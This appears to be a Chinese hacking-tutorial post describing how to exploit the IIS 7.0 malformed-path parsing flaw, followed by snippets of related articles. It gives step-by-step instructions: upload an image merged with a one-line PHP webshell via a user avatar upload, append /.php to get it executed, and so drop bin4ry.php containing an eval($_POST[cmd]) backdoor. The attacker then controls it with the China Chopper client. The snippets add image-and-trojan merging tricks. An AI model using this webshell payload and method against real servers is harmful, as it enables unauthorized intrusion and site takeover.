IIS7 0 php錯誤檔案解析漏洞利用例項

2021-12-29 23:55:46 字數 350 閱讀 5939

得到www.2cto.com(僅為舉例,非真實)web服務為iis7.0

www.2cto.com /robots.txt後面加上/任意字元.php成功解析為php

註冊個使用者名稱,找到頭像上傳位址,上傳乙個正常加一句話小馬合併起來的一句話馬  

<?fputs (fopen(bin4ry.php,w),<?eval($_post[cmd]);?>)?>

如果檔案被成功解析,那就會在當前目錄生成bin4ry.php裡面內容為一句話,密碼cmd

上傳後得到位址,在後加上/.php 成功解析,那麼目錄就會生成bin4ry.php

用菜刀連線

作者 nios

IIS6 0和IIS7 0解析漏洞

目錄iis7.0 7.5解析漏洞 參考環境搭建 目錄解析漏洞 在iis6.0中,目錄中以 asp命名的資料夾下的檔案將會被以asp格式解析 我們先建立乙個txt檔案,新增helloworld內容,隨後將其更改為.jpg格式 在 目錄下訪問1.jpg檔案,該檔案是以jpg檔案解析 訪問以 asp命名的...

通殺IIS7 0畸形解析0day漏洞

dos合併 copy 1.gif b 1.txt a asp.gif 用edjpgcom,進行和一句話木馬的合併,隨便找一張.edjpgcom.exe上面,然後edjpgcom.exe會自動開啟,寫入想要些的 即可 一句話 然後找個nginx的站,先註冊乙個使用者然後在論壇上傳一張我們剛剛合併的一句...

IIS檔名解析漏洞扼要分析

概括 從技術角度分析iis6檔名解析漏洞的原理與iis7的相關情況。a.iis6錯誤解析檔案型別現象 1 當web目錄下,檔名以 asp 來進行命名的時候,此檔案將送交asp.dll解析 也就是執行指令碼 2 當web目錄下,在訪問以 asp 命名的目錄下的任意檔案時,此檔案將送交asp.dll解析...